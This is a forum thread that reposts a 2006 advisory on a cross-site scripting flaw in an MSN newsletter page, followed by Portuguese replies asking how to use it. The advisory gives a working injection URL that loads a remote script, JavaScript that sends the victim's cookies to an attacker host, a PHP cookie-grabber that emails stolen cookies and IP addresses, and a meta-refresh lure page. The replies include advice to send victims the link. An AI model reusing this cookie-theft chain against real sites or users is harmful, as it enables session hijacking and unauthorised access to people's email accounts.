FORUM DARKERS

Hotmail/MSN Cross Site Scripting Vulnerability

Author: Simo64
Contact: simo64_at_morx_dot_org
Discovered: 07/25/2006
Published: 08/10/2006
Vendor: MSN.com
Service: Hotmail.com Webmail Service
Vulnerability: Cross Site Scripting (Cookie-Theft)
Severity: Medium/High
Tested on: IE 6.0, firefox 1.5 and Opera (should work on all
browsers)

Morx Security Research Team
http://www.morx.org


Details:

newsletter.msn.com's insite.asp script is prone to cross-site scripting attacks. This problem is due to a failure in the
 application to properly sanitize user-supplied input.

Impact:

an attacker can exploit the vulnerable script to have arbitrary script code executed in the browser of an authentified
msn user in the context of the msn webpage. resulting in the theft of cookie-based authentication giving the attacker3
temporary access to the victim's email account (until the cookie expires - about 24 hours) as well as other type of attacks.



Exploit:

http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=')></script><script src=http://attacker/redir.js>

Where redir.js code can be :

location.href='http://attacker-site/cookie-grabber.php?cookie='+escape(document.cookie)

and cookie-grabber.php can be:

<?
$cookie = $_GET['cookie'];
$ip = getenv("REMOTE_ADDR");
$msg = "Cookie: $cookie\nIP Address: $ip";
$subject = "cookie";
mail("your@email.org", $subject, $msg);

header ("location: http://attacker-site/some-pic.jpg");
?>

the attacker also would use an html file to redirect the victim to the xss location

as an example of that:

<meta http-equiv="refresh" content="0; url=http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=')></script><script src=http://attacker/redir.js>">

Disclaimer:

this entire document is for eductional, testing and demonstrating purpose only. Modification use and/or publishing this
information is entirely on your OWN risk. The information provided in this advisory is to be used/tested on your OWN
machine/Account. I cannot be held responsible for any of the above

O q esse explit faz
me esplica ae !!!
vlw

Você rouba o Cookie da vitima e com uma Vulnerabilidade  no Certificado da M$ voce poderá ter acesso ao e-mail dela por aproximadamente 24h até que os Cockies se expiram.

eliminar cookies e lei !!

Como usar ele?
alguem de me uma ajudinha pls..
flws x]

Quote from: "Security"Como usar ele?
alguem de me uma ajudinha pls..
flws x]

Se você estive-se lido os comentarios, você não estaria perguntando isso...


ate mais

sou meio ruim no inglês :/
aonde posso aprender bem inglÊs
flws

Quote from: "Security"sou meio ruim no inglês :/
aonde posso aprender bem inglÊs
flws

http://www.google.com.br/language_tools?hl=pt-BR (//http://www.google.com.br/language_tools?hl=pt-BR)


traduz ae velho

interessante

vc manda a vitima clicar num link

http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=' (http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE='))>